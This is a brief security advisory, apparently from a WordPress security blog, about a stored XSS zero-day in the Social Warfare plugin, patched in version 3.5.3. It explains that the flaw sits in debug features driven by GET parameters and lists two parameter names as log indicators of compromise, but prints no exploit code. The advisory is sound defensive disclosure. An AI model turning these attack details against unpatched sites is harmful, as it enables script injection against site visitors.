Zero-Day Stored XSS in Social Warfare


Exploitation Level: Easy / Remote

DREAD Score: 7.2

Vulnerability: Stored XSS

Patched Version: 3.5.3

A zero-day vulnerability has just appeared in the WordPress plugin world, affecting over 70,000 sites using the Social Warfare plugin.

The plugin is vulnerable to a Stored XSS (Cross-Site Scripting) vulnerability and has been removed from the plugin repository. Attacks can be conducted by any users visiting the site.

A patch has been released and users are advised to update to version 3.5.3 as soon as possible.

What Is It All About?

The vulnerable code is contained within some of the plugins debugging features. These features aren’t directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability.

A fully working PoC is available in the wild and we expect the number of exploit attempts to grow in size in the coming days.

Indicators of Compromise:

You can look for requests pointing to any PHP file /wp-admin/ with the following parameters in your access logs:

  • swp_debug
  • swp_url

Read more…